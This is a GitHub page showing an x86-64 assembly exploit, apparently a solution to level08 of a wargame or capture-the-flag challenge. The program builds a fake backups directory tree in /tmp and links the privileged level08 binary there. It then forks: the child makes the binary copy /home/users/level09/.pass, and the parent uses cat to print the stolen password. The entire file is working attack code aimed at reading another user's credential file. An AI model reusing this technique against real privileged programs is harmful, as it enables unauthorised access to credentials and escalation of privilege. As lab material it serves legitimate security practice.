FilesExpand file tree

 master

/

exploit_08.asm

Copy path

Blame

More file actions

Blame

More file actions

Latest commit

 

History

History

History

144 lines (126 loc) · 2.49 KB

 master

/

exploit_08.asm

Top

File metadata and controls

• Code
• Blame

144 lines (126 loc) · 2.49 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

format ELF64 executable $03

entry _start

struc string data*& {

.: db data

.length = ($ - .)

}

struc timespec {

.tv_sec: rq $01

.tv_nsec: rq $01

}

virtual at $00

timespec timespec

timespec.sizeof = $

end virtual

S_IRWXU = $01C0

S_IRWXG = $0038

S_IRWXO = $0007

S_IRGRP = $0020

S_IWGRP = $0010

S_IROTH = $0004

S_IWOTH = $0002

segment executable readable

_start:

mov rax, $53

mov rdi, _tmp

mov rsi, S_IRWXU or S_IRWXG or S_IRWXO

syscall

test rax, rax

jnz .error

mov rax, $50

mov rdi, _tmp

syscall

test rax, rax

jnz .exit

rept $04 i:$01

{

mov rax, $53

mov rdi, _path_#i

mov rsi, S_IRWXU or S_IRWXG or S_IRWXO

syscall

test rax, rax

jnz .exit

mov rax, $5A

mov rdi, _path_#i

mov rsi, S_IRWXU or S_IRWXG or S_IRWXO

syscall

test rax, rax

jnz .exit

}

mov rax, $55

mov rdi, _log

mov rsi, S_IRWXU or S_IRGRP or S_IWGRP or S_IROTH or S_IWOTH

syscall

test rax, rax

js .exit

mov rdi, rax

mov rax, $03

syscall

mov rax, $5A

mov rdi, _log

mov rsi, S_IRWXU or S_IRGRP or S_IWGRP or S_IROTH or S_IWOTH

syscall

test rax, rax

jnz .exit

mov rax, $58

mov rdi, _program

mov rsi, _current

syscall

test rax, rax

jnz .exit

mov rax, $39

syscall

test rax, rax

jz .child

mov rcx, timespec.sizeof

sub rsp, rcx

xor al, al

mov rdi, rsp

cld

rep stosb

mov byte [rsp+timespec.tv_sec], $01

mov rax, $23

mov rdi, rsp

xor rsi, rsi

syscall

add rsp, timespec.sizeof

mov rax, $3B

mov rdi, _cat

mov rcx, _retrieve

xor rdx, rdx

push rdx rcx rdi

mov rsi, rsp

syscall

jmp .exit

.child:

mov rax, $3B

mov rdi, _current

mov rcx, _argument

xor rdx, rdx

push rdx rcx rdi

mov rsi, rsp

syscall

.exit:

mov rax, $3C

xor rdi, rdi

syscall

.error:

mov rax, $01

mov rdi, $02

mov rsi, _cant_create_tmp

mov rdx, _cant_create_tmp.length

syscall

jmp .exit

segment readable

_program: db "/home/users/level08/level08", $00

_current: db "./level08", $00

_cat: db "/bin/cat", $00

_retrieve: db "./backups"

_argument: db "/home/users/level09/.pass", $00

_tmp: db "/tmp/exploit", $00

_cant_create_tmp string "[ERROR]: Can't create /tmp/exploit", $0A

_path_1: db "./backups", $00

_path_2: db "./backups/home", $00

_path_3: db "./backups/home/users", $00

_path_4: db "./backups/home/users/level09", $00

_log: db "./backups/.log", $00